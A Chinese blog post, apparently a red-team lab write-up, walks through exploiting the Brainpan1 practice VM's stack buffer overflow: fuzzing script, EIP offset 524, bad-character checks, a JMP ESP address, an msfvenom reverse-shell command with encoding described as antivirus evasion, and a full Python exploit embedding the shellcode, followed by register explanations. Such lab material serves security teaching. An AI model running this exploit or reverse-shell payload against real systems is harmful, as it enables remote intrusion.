第十一篇红队笔记-百靶精讲之Brainpan1-缓存区溢出

nmap扫描

在这里插入图片描述
在这里插入图片描述

web渗透测试

在这里插入图片描述
在这里插入图片描述

缓冲区溢出漏洞识别

  • 查看文件
    在这里插入图片描述
  • 通过Immunity Debugger查看exe内存动态变化
    • 需要点击开始,右下角runing状态,此时相当于运行该exe
      在这里插入图片描述
  • 编写py脚本判断是否存在缓冲溢出
#! /usr/bin/python

import socket
import time
import sys

size = 100
server = str(sys.argv[1])
port = int(sys.argv[2])

while True:
    try:
        print("\n[+] buffer is %s byets" % size);
        buffer = "A" * size
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect((server,port))
        print(buffer+"1")
        s.send(buffer.encode())
        s.close()
        size += 100
        time.sleep(3)
    except:
        print ("\n[+] Cloud not connect.")
        sys.exit()

在这里插入图片描述

  • 可以判定存在溢出且大小不会超过1k
    在这里插入图片描述

定位eip寄存器

  • 确定漏洞溢出点的长度。一般将工具 msf-pattern_create和 msf-pattern_offset配合使用。

  • msf-pattern_create生成上述溢出大小不会超过1k的长度字符串
    在这里插入图片描述

  • 得到此时EIP内存地址为35724134
    在这里插入图片描述

  • 根据EIP地址得出偏移量
    在这里插入图片描述

  • 再次确认偏移量524是否准确的溢出点
    在这里插入图片描述

esp扩容

  • 一般一个payload字节是300-500字节
    在这里插入图片描述
    在这里插入图片描述

坏字节识别

  • 判断esp中间有哪些坏字符不能被我们所用
  • 下载坏字符
    在这里插入图片描述
    -判断坏字符是否都正常显示(\x00默认终止符号)
    在这里插入图片描述
    在这里插入图片描述

jmp esp定位

  • esp它的确是eip结束之后去执行的,但是它具体在哪个位置上不清楚.

  • 使用eip地址去重定向到esp。所以我们要通过在eip这四个字节里面写上esp的地址。一般使用jmp esp

  • 先用msf-nasm_shell工具明确想写的指令

    • 可看到jmp esp地址:\xff\xe4
      在这里插入图片描述
  • !mona modules 查看可用的dll模块
    在这里插入图片描述

  • 根据可用dll,搜索jmp esp 地址
    在这里插入图片描述

  • 获得JMP ESP地址:311712F3
    在这里插入图片描述

payload编写

# x86/shikata_ga_nai 防免杀
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.0.2.132 -e x86/shikata_ga_nai -b "\x00" -f python

在这里插入图片描述

#coding:utf-8


import socket
import time
import sys

size = 100
server = str(sys.argv[1])
port = int(sys.argv[2])

while True:
    try:
        print("\n[+] buffer is %s byets" % size);
        buf =  b""
        buf += b"\xbb\x37\x60\x4f\x5f\xda\xc6\xd9\x74\x24\xf4\x5d"
        buf += b"\x33\xc9\xb1\x52\x83\xed\xfc\x31\x5d\x0e\x03\x6a"
        buf += b"\x6e\xad\xaa\x68\x86\xb3\x55\x90\x57\xd4\xdc\x75"
        buf += b"\x66\xd4\xbb\xfe\xd9\xe4\xc8\x52\xd6\x8f\x9d\x46"
        buf += b"\x6d\xfd\x09\x69\xc6\x48\x6c\x44\xd7\xe1\x4c\xc7"
        buf += b"\x5b\xf8\x80\x27\x65\x33\xd5\x26\xa2\x2e\x14\x7a"
        buf += b"\x7b\x24\x8b\x6a\x08\x70\x10\x01\x42\x94\x10\xf6"
        buf += b"\x13\x97\x31\xa9\x28\xce\x91\x48\xfc\x7a\x98\x52"
        buf += b"\xe1\x47\x52\xe9\xd1\x3c\x65\x3b\x28\xbc\xca\x02"
        buf += b"\x84\x4f\x12\x43\x23\xb0\x61\xbd\x57\x4d\x72\x7a"
        buf += b"\x25\x89\xf7\x98\x8d\x5a\xaf\x44\x2f\x8e\x36\x0f"
        buf += b"\x23\x7b\x3c\x57\x20\x7a\x91\xec\x5c\xf7\x14\x22"
        buf += b"\xd5\x43\x33\xe6\xbd\x10\x5a\xbf\x1b\xf6\x63\xdf"
        buf += b"\xc3\xa7\xc1\x94\xee\xbc\x7b\xf7\x66\x70\xb6\x07"
        buf += b"\x77\x1e\xc1\x74\x45\x81\x79\x12\xe5\x4a\xa4\xe5"
        buf += b"\x0a\x61\x10\x79\xf5\x8a\x61\x50\x32\xde\x31\xca"
        buf += b"\x93\x5f\xda\x0a\x1b\x8a\x4d\x5a\xb3\x65\x2e\x0a"
        buf += b"\x73\xd6\xc6\x40\x7c\x09\xf6\x6b\x56\x22\x9d\x96"
        buf += b"\x31\x47\x62\x9a\x45\x3f\x60\x9a\x44\x7b\xed\x7c"
        buf += b"\x2c\x6b\xb8\xd7\xd9\x12\xe1\xa3\x78\xda\x3f\xce"
        buf += b"\xbb\x50\xcc\x2f\x75\x91\xb9\x23\xe2\x51\xf4\x19"
        buf += b"\xa5\x6e\x22\x35\x29\xfc\xa9\xc5\x24\x1d\x66\x92"
        buf += b"\x61\xd3\x7f\x76\x9c\x4a\xd6\x64\x5d\x0a\x11\x2c"
        buf += b"\xba\xef\x9c\xad\x4f\x4b\xbb\xbd\x89\x54\x87\xe9"
        buf += b"\x45\x03\x51\x47\x20\xfd\x13\x31\xfa\x52\xfa\xd5"
        buf += b"\x7b\x99\x3d\xa3\x83\xf4\xcb\x4b\x35\xa1\x8d\x74"
        buf += b"\xfa\x25\x1a\x0d\xe6\xd5\xe5\xc4\xa2\xe6\xaf\x44"
        buf += b"\x82\x6e\x76\x1d\x96\xf2\x89\xc8\xd5\x0a\x0a\xf8"
        buf += b"\xa5\xe8\x12\x89\xa0\xb5\x94\x62\xd9\xa6\x70\x84"
        buf += b"\x4e\xc6\x50"

        buffer = "\x41" * 524 + "\xf3\x12\x17\x31" + "\x90" * 16 + buf
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect((server,port))
        s.recv(1024)
        s.send(buffer)
        print "done"
        size += 100
        time.sleep(3)
    except Exception as errorMsg:
            print "产生错误了:%s'%errorMsg"
            print "\n[+] Cloud not connect."
            sys.exit()


  • 监听shell反弹端口
    在这里插入图片描述

成功利用缓冲区漏洞

  • 同上(针对靶机linux)
    在这里插入图片描述

巧用anansi_util提权

在这里插入图片描述

其他

缓冲区溢出漏洞流程

  • 解缓冲区溢出漏洞的识别、大小,定位eip寄存器、esp寄存器扩容、坏字节识别、jmp esp定位,payload生成

EIP、EBP、ESP的解读

  • EIP存储着下一条指令的地址,每执行一条指令,该寄存器变化一次。
  • EBP存储着当前函数栈底的地址,栈低通常作为基址,我们可以通过栈底地址和偏移相加减来获取变量地址(很重要)。
  • ESP就是前面说的,始终指向栈顶,只要ESP指向变了,那么当前栈顶就变了。

为什么EIP是41414141可以判断缓冲区存在溢出

  • 这不是什么根本性的。这只是一个历史惯例。更详细地说:测试缓冲区溢出的最简单方法是在文本字段中键入一长串 A (AAAAAAAA…),然后看看会发生什么。如果程序崩溃,则可能容易受到攻击。如果程序崩溃并且调试器在程序计数器中显示0x41414141,该程序几乎肯定是脆弱的。(请记住,“A”的 ASCII 代码是十六进制0x41的,所以如果你在十六进制编辑器中查看 A 字符串的字节级表示形式,你会看到0x41414141。
  • 为什么是A?完全没有理由;它们只是字母表中的第一个字母。因此,这是渗透测试人员有时会使用的快速而肮脏的测试。但是,当然,0x41414141并没有什么特别之处。道格拉斯·亚当斯的粉丝可以输入一长串B,然后寻找0x42424242。那同样有效,甚至更有趣。

确认偏移量524是否准确的溢出点

  • 准确显示AABBCC=524是溢出点
    在这里插入图片描述

怎么通过35724134地址得到524就是偏移量

在这里插入图片描述

  • 首先要知道内存地址和平常书写地址是相反的,内存会把内存低地址放在高位,内存高地址放在低位,所以排列顺序是:

    35724134
    34 41 72 35
    4  A  r  5
    4Ar5
    
  • 对照的就是pattern_create.rb生成的1000字符中524位的地方存在溢出,pattern_offset.rb会自动计算在1000个字符中4Ar5位置

为什么要测试坏字符

  • 坏字符本意是 A 的机器码发送到服务端,服务端存入内存时却变成了 B。比方说我想执行的shellcode 为 0a,但存入内存中后啪的一下变成了 00,这就很不好了,shellcode就不是我们原来正常的逻辑了。

发生pycommands:error importing module.

在这里插入图片描述

  1. 下载python2.7
  2. 查看Immunity Debugger\PyCommands该文件夹是否有mona.py,无则另外下载

怎么判定可用dll模块

  • SafeSEH、ASLR、NXCompat都是内存保护机制所保护的模块!
  • 要选择JMP ESP一定要选择这三项都未False的模块

为什么跑的是window-exe确实linux

在这里插入图片描述

  • 8
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值